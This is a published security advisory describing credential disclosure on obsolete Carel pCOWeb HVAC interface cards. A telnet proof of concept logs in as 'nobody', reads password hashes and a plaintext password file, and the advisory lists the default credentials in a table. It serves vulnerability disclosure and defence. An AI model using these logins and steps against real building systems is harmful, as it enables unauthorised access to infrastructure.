Advisory: Unsafe Storage of Credentials in Carel pCOWeb HVAC

The Carel pCOWeb card stores password hashes in the file "/etc/passwd",
allowing privilege escalation by authenticated users. Additionally,
plaintext copies of the passwords are stored.


Details
=======

Product: HVAC units using the OEM Carel pCOWeb Ethernet Control Interface
Affected Versions: "A 1.4.11 - B 1.4.2", possibly others
Fixed Versions: product obsolete
Vulnerability Type: Credential Disclosure / Privilege Escalation
Security Risk: low
Vendor URL: https://www.carel.com/product/pcoweb-card
Vendor Status: notified / product obsolete
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-13
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction
============

"The pCOWeb card is used to interface the pCO Sistema to networks that
use the HVAC protocols based on the Ethernet physical standard, such as
BACnet IP, Modbus TCP/IP and SNMP. The card also features an integrated
Web-Server, which both contains the HTML pages relating to the specific
application and allows a browser to be used for remote system
management."
(from the vendor's homepage)

It is used as an OEM module in several different HVAC systems and
considered obsolete by the vendor.


More Details
============

The Carel pCOWeb interface provides user accounts with different levels
of privileges. Despite the different privileges, other users, even the
user nobody, are able to read the file "/etc/passwd" which contains the
hashed passwords for all user accounts, especially those with more
privileges. Additionally, a plaintext copy of all passwords is stored in
the file /usr/local/root/flash/etc/sysconfig/userspwd, which is
accessible from the web interface at the URL
http://192.168.0.1/config/pw_changeusers.html
This allows attackers with knowledge of one user account password to
gain knowledge of the other accounts passwords, possibly gaining more
privileges.


Proof of Concept
================

Apart from a web interface, the Carel pCOWeb card provides a telnet
interface accessible using a variety of default passwords and, in some
cases, the user "nobody" without password:

------------------------------------------------------------------------
$ telnet 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.

Linux 2.4.21-rmk1 (pCOWeb) (ttya0)


pCOWeb login: nobody
No directory /var/lib/nobody!
Logging in with home = "/".
Executing profile
/usr/local/bin:/bin:/usr/bin
[nobody@pCOWeb13:58:55 /]$ ls -la /etc/passwd
-rw-r--r--   1 root     root          317 Jan  1 00:00 /etc/passwd
[nobody@pCOWeb13:59:00 /]$ cat /etc/passwd
root:o4jAwxNRjdSSk:0:0:root:/root:/bin/bash
http::48:48:HTTP users:/usr/http/root:/bin/bash
nobody::99:99:nobody:/var/lib/nobody:/bin/bash
httpadmin:p4erNF6yyLx0U:200:200:httpadmin:/usr/local/root/http:/bin/bash
carel:f4msfA.Ljf2Fo:500:500:carel:/home:/bin/bash
guest:d4iIyYc5JrnxM:502:101:guest:/usr/bin:/bin/bash
[nobody@pCOWeb13:59:32 /]$ cat /usr/local/root/admin/.htpasswd
admin:7c3fxxrcHcwtc
[nobody@pCOWeb13:59:33 /]$
------------------------------------------------------------------------

The following table lists the cleartext passwords for above
password hashes:

 username   |  password
 ----------------------
 root       |  froot
 httpadmin  |  fhttpadm
 carel      |  fcarel
 guest      |  fguest
 nobody     |  (none)
 admin      |  fadmin

The passwords for the useraccounts "root", "httpadmin", "carel" and
"guest" are documented in section 9.7.2 of the user manual [0], warning
users:

   "it is important to set a password other than the default "froot" to
    prevent potentially dangerous outside access."


It is possible that these default credentials are covered in
CVE-2019-13553. Depending on firmware version and/or OEM modifications,
some versions additionally allow Telnet login without password with the
username "nobody" while it is disabled for other versions.

The password for the web interface user "admin" is documented in section
9.2.1 of the user manual [0].

Additionally, some versions were seen with additional user credentials
stored in the directory provided for OEM modifications of the web
interface, such as the username "reserved" with the password "freserve"
in "/usr/local/root/flash/http/reserved/.htpasswd".
Storing some of these passwords in plaintext is covered in
CVE-2019-11369.

However, while the above passwords are stored in hashed form, the web
interface at http://192.168.0.1/config/pw_changeusers.html shows them in
plaintext. A file containing the plaintext passwords can be found in the
filesystem:

------------------------------------------------------------------------
[root@pCOWeb14:02:14 /]# cat /usr/local/root/flash/etc/sysconfig/userspwd
PROOT=froot
PHTTP=fhttpadmin
PGUEST=fguest
PCAREL=fcarel
------------------------------------------------------------------------


Workaround
==========

Change all default passwords listed above and ensure the user "nobody"
is disabled or has a password set.
The Carel pCOWeb card should not be connected to networks accessible by
untrusted users (compare advisory rt-sa-2019-014[1]).


Fix
===

No updated firmware will be published for pCOWeb Cards, as they are
obsolete since Dec 2017. A successor hardware with current firmware is
available for OEM integrators.


Security Risk
=============

Attackers with knowledge of one set of user credentials to a Carel
pCOWeb card could use the password hashes accessible to all users in
"/etc/passwd" or the plaintext copies of the passwords to gain
different privileges. Due to the necessity of access to credentials,
this is considered to pose a low risk only.


Timeline
========

2019-07-17 Vulnerability identified
2019-08-03 Customer approved disclosure to vendor
2019-09-02 Vendor notified
2019-09-09 Vendor did not respond as promised
2019-09-17 Vendor could not be reached
2019-09-18 Vendor could not be reached
2019-09-18 Vendor could not be reached
2019-10-28 Advisory published due to publication of CVE-2019-13553


References
==========

[0] https://www.carel.com/documents/10191/0/+030220471/9619472f-f1c0-4ec9-a151-120aaa5e479a?version=1.0
[1] https://www.redteam-pentesting.de/de/advisories/rt-sa-2019-014.txt


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

-- 
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Dennewartstr. 25-27                       Fax : +49 241 510081-99
52068 Aachen                    https://www.redteam-pentesting.de
Germany                         Registergericht: Aachen HRB 14004
Geschäftsführer:                       Patrick Hof, Jens Liebchen